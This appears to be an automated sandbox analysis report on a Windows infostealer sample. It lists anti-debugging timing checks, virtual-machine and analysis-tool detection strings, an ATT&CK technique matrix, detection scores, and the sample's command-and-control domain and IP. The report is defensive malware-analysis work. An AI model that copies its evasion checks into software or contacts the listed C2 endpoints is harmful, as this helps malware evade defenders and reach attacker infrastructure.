Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 7110D1D second address: 7110D37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FFB28B7466Fh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 7110D37 second address: 7110D84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, C4h 0x00000005 pushfd 0x00000006 jmp 00007FFB28DE2A10h 0x0000000b add al, FFFFFFC8h 0x0000000e jmp 00007FFB28DE2A0Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 jmp 00007FFB28DE2A19h 0x0000001d xchg eax, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov bx, 20BEh 0x00000025 mov bl, 8Ah 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 7110D84 second address: 7110D89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70B00DD second address: 70B00E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70B00E1 second address: 70B00F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B74674h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70B00F9 second address: 70B00FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70B00FF second address: 70B0103 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70B0103 second address: 70B0120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FFB28DE2A10h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70B0120 second address: 70B012F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B7466Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70B012F second address: 70B01A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d jmp 00007FFB28DE2A0Ch 0x00000012 call 00007FFB28DE2A12h 0x00000017 pushfd 0x00000018 jmp 00007FFB28DE2A12h 0x0000001d adc si, BDA8h 0x00000022 jmp 00007FFB28DE2A0Bh 0x00000027 popfd 0x00000028 pop esi 0x00000029 popad 0x0000002a mov ebp, esp 0x0000002c jmp 00007FFB28DE2A0Fh 0x00000031 pop ebp 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 705002F second address: 7050035 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 7050035 second address: 705006A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFB28DE2A15h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 7050656 second address: 705065D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 705065D second address: 7050672 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 1A9Ah 0x00000007 mov ecx, edx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov ebx, eax 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 7050672 second address: 7050678 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 7050678 second address: 7050687 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 7050687 second address: 705068B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70A08DA second address: 70A08E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70A08E0 second address: 70A08FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B7466Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70A08FA second address: 70A08FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70A08FE second address: 70A0902 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70A0902 second address: 70A0908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70A0908 second address: 70A093C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FFB28B74670h 0x00000008 pop eax 0x00000009 jmp 00007FFB28B7466Bh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 movzx esi, dx 0x00000017 push edx 0x00000018 push ecx 0x00000019 pop edx 0x0000001a pop eax 0x0000001b popad 0x0000001c pop ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70A093C second address: 70A0942 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70A0942 second address: 70A0948 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70A0948 second address: 70A094C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\r8nllkNEQX.exeSpecial instruction interceptor: First address: A20B37 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\r8nllkNEQX.exeSpecial instruction interceptor: First address: BC5843 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\r8nllkNEQX.exeSpecial instruction interceptor: First address: BEC92D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\r8nllkNEQX.exeSpecial instruction interceptor: First address: BD6BE8 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_004B9980 rdtsc 0_2_004B9980
Source: C:\Users\user\Desktop\r8nllkNEQX.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_002D255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_002D255D
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_002D29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_002D29FF
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_002D255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_002D255D
Source: r8nllkNEQX.exe, r8nllkNEQX.exe, 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: r8nllkNEQX.exe, 00000000.00000003.1525807690.0000000001541000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZ
Source: r8nllkNEQX.exeBinary or memory string: Hyper-V RAW
Source: r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: r8nllkNEQX.exe, 00000000.00000003.1527894006.0000000006921000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlQ=
Source: r8nllkNEQX.exe, 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: r8nllkNEQX.exe, 00000000.00000003.1599729719.00000000015B4000.00000004.00000020.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000003.1600044768.00000000015B4000.00000004.00000020.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1606989887.00000000015B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\r8nllkNEQX.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\r8nllkNEQX.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\r8nllkNEQX.exeThread information set: HideFromDebuggerJump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\r8nllkNEQX.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\r8nllkNEQX.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\r8nllkNEQX.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\r8nllkNEQX.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\r8nllkNEQX.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\r8nllkNEQX.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\r8nllkNEQX.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\r8nllkNEQX.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\r8nllkNEQX.exeFile opened: NTICE
Source: C:\Users\user\Desktop\r8nllkNEQX.exeFile opened: SICE
Source: C:\Users\user\Desktop\r8nllkNEQX.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\r8nllkNEQX.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\r8nllkNEQX.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\r8nllkNEQX.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_004B9980 rdtsc 0_2_004B9980
Source: r8nllkNEQX.exe, r8nllkNEQX.exe, 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: TYProgram Manager
Source: C:\Users\user\Desktop\r8nllkNEQX.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\r8nllkNEQX.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\r8nllkNEQX.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\r8nllkNEQX.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: r8nllkNEQX.exe, 00000000.00000003.1507111399.000000000738F000.00000004.00001000.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: procmon.exe
Source: r8nllkNEQX.exe, 00000000.00000003.1507111399.000000000738F000.00000004.00001000.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: wireshark.exe

Stealing of Sensitive Information

barindex
Infostealer behavior detected
Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Leaks process information
Source: global trafficTCP traffic: 192.168.2.8:49705 -> 91.149.241.220:80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
Process Injection		23
Virtualization/Sandbox Evasion		OS Credential Dumping751
Security Software Discovery		1
Exploitation of Remote Services		11
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory23
Virtualization/Sandbox Evasion		Remote Desktop Protocol1
Data from Local System		4
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager13
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive4
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
Obfuscated Files or Information		NTDS1
Remote System Discovery		Distributed Component Object ModelInput Capture5
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
Software Packing		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials216
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
r8nllkNEQX.exe55%ReversingLabsWin32.Infostealer.Tinba
r8nllkNEQX.exe100%AviraTR/Crypt.TPM.Gen
r8nllkNEQX.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMah0%Avira URL Cloudsafe
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=00%Avira URL Cloudsafe
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb173553773869630%Avira URL Cloudsafe
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb180%Avira URL Cloudsafe
http://home.fortth14vs.top/gduZ(%P0%Avira URL Cloudsafe
http://home.fortth14vs.top/gduZ0%Avira URL Cloudsafe
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb17355377380%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
home.fortth14vs.top
91.149.241.220
truefalse
    		high
    httpbin.org
    		34.200.57.114
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0true
      • Avira URL Cloud: safe
      		unknown
      http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738true
      • Avira URL Cloud: safe
      		unknown
      https://httpbin.org/ipfalse
        		high

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://curl.se/docs/hsts.htmlr8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpfalse
          		high
          http://html4/loose.dtdr8nllkNEQX.exe, 00000000.00000003.1507111399.000000000738F000.00000004.00001000.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpfalse
            		high
            https://curl.se/docs/alt-svc.html#r8nllkNEQX.exefalse
              		high
              http://home.fortth14vs.top/gduZ(%Pr8nllkNEQX.exe, 00000000.00000003.1599645314.0000000001593000.00000004.00000020.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000003.1600094570.00000000015B0000.00000004.00000020.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000003.1600044768.00000000015A6000.00000004.00000020.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1606989887.00000000015B1000.00000004.00000020.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000003.1599729719.00000000015A0000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://httpbin.org/ipbeforer8nllkNEQX.exe, 00000000.00000003.1507111399.000000000738F000.00000004.00001000.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpfalse
                		high
                http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMahr8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://curl.se/docs/http-cookies.htmlr8nllkNEQX.exe, r8nllkNEQX.exe, 00000000.00000003.1507111399.000000000738F000.00000004.00001000.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpfalse
                  		high
                  http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://curl.se/docs/hsts.html#r8nllkNEQX.exefalse
                    		high
                    http://home.fortth14vs.top/gduZr8nllkNEQX.exe, 00000000.00000003.1599645314.0000000001593000.00000004.00000020.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000003.1600094570.00000000015B0000.00000004.00000020.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000003.1600044768.00000000015A6000.00000004.00000020.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1606989887.00000000015B1000.00000004.00000020.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000003.1599729719.00000000015A0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb17355377386963r8nllkNEQX.exe, 00000000.00000003.1600313001.0000000001532000.00000004.00000020.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1606792210.0000000001539000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://curl.se/docs/http-cookies.html#r8nllkNEQX.exefalse
                      		high
                      https://curl.se/docs/alt-svc.htmlr8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpfalse
                        		high
                        http://.cssr8nllkNEQX.exe, 00000000.00000003.1507111399.000000000738F000.00000004.00001000.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpfalse
                          		high
                          http://.jpgr8nllkNEQX.exe, 00000000.00000003.1507111399.000000000738F000.00000004.00001000.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpfalse
                            		high

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            91.149.241.220
                            		home.fortth14vs.topPoland
                            		41952MARTON-ASPLfalse
                            34.200.57.114
                            		httpbin.orgUnited States
                            		14618AMAZON-AESUSfalse

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1582706
                            Start date and time:2024-12-31 09:49:52 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 4m 19s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:3
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:r8nllkNEQX.exe
                            renamed because original name is a hash value
                            Original Sample Name:5d07283413428b07167fbcdbb4063558.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@1/0@8/2
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:Failed
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Stop behavior analysis, all processes terminated

                            Warnings

                            • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
                            • Excluded IPs from analysis (whitelisted): 172.202.163.200
                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com
                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            • VT rate limit hit for: r8nllkNEQX.exe

                            Simulations

                            Behavior and APIs

                            No simulations

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            91.149.241.220yqUQPPp0LM.exeGet hashmaliciousUnknownBrowse
                            • home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
                            ZN34wF8WI2.exeGet hashmaliciousUnknownBrowse
                            • home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
                            Hqle5OSmLQ.exeGet hashmaliciousUnknownBrowse
                            • home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
                            34.200.57.114ivHDHq51Ar.exeGet hashmaliciousUnknownBrowse

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              home.fortth14vs.topyqUQPPp0LM.exeGet hashmaliciousUnknownBrowse
                              • 91.149.241.220
                              ZN34wF8WI2.exeGet hashmaliciousUnknownBrowse
                              • 91.149.241.220
                              Hqle5OSmLQ.exeGet hashmaliciousUnknownBrowse
                              • 91.149.241.220
                              httpbin.orgyqUQPPp0LM.exeGet hashmaliciousUnknownBrowse
                              • 34.197.122.172
                              ivHDHq51Ar.exeGet hashmaliciousUnknownBrowse
                              • 34.200.57.114
                              ZN34wF8WI2.exeGet hashmaliciousUnknownBrowse
                              • 34.197.122.172
                              Hqle5OSmLQ.exeGet hashmaliciousUnknownBrowse
                              • 34.197.122.172
                              Set-up.exeGet hashmaliciousUnknownBrowse
                              • 52.202.253.164
                              Set-up.exeGet hashmaliciousUnknownBrowse
                              • 34.197.122.172
                              Set-up.exeGet hashmaliciousUnknownBrowse
                              • 52.73.63.247
                              a2mNMrPxow.exeGet hashmaliciousUnknownBrowse
                              • 3.218.7.103
                              SgMuuLxOCJ.exeGet hashmaliciousLummaCBrowse
                              • 34.226.108.155
                              TNyOrM6mIM.exeGet hashmaliciousLummaCBrowse
                              • 3.218.7.103

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              AMAZON-AESUSyqUQPPp0LM.exeGet hashmaliciousUnknownBrowse
                              • 34.197.122.172
                              ivHDHq51Ar.exeGet hashmaliciousUnknownBrowse
                              • 34.200.57.114
                              ZN34wF8WI2.exeGet hashmaliciousUnknownBrowse
                              • 34.197.122.172
                              Hqle5OSmLQ.exeGet hashmaliciousUnknownBrowse
                              • 34.197.122.172
                              PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                              • 44.221.84.105
                              http://ghostbin.cafe24.com/Get hashmaliciousUnknownBrowse
                              • 44.199.56.69
                              Set-up.exeGet hashmaliciousUnknownBrowse
                              • 52.202.253.164
                              kwari.mips.elfGet hashmaliciousUnknownBrowse
                              • 54.226.65.111
                              Set-up.exeGet hashmaliciousUnknownBrowse
                              • 34.197.122.172
